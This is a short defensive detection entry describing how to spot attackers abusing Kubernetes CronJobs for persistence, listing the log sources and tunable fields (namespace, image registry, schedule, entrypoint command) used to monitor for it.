Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.
| Data Component | Name | Channel |
|---|---|---|
| Scheduled Job Creation (DC0001) | kubernetes:apiserver | verb=create, resource=cronjobs, group=batch |
| Container Creation (DC0072) | kubernetes:events | container start/stop activity via Docker, containerd, or CRI-O |
| Network Traffic Content (DC0085) | container:proxy | outbound/inbound network activity from spawned pods |
| Field | Description |
|---|---|
| NamespaceScope | Kubernetes namespace the job is deployed to—scoping this to known trusted namespaces may reduce noise. |
| ImageRepository | The container image registry or repository the job pulls from—can be filtered by trusted registries. |
| ScheduleWindow | Time window or frequency of CronJob execution (e.g., ‘@hourly’)—jobs running at odd hours may be suspicious. |
| ExecutionCommand | The command or entrypoint executed by the Job—unexpected shell commands or interpreters may warrant inspection. |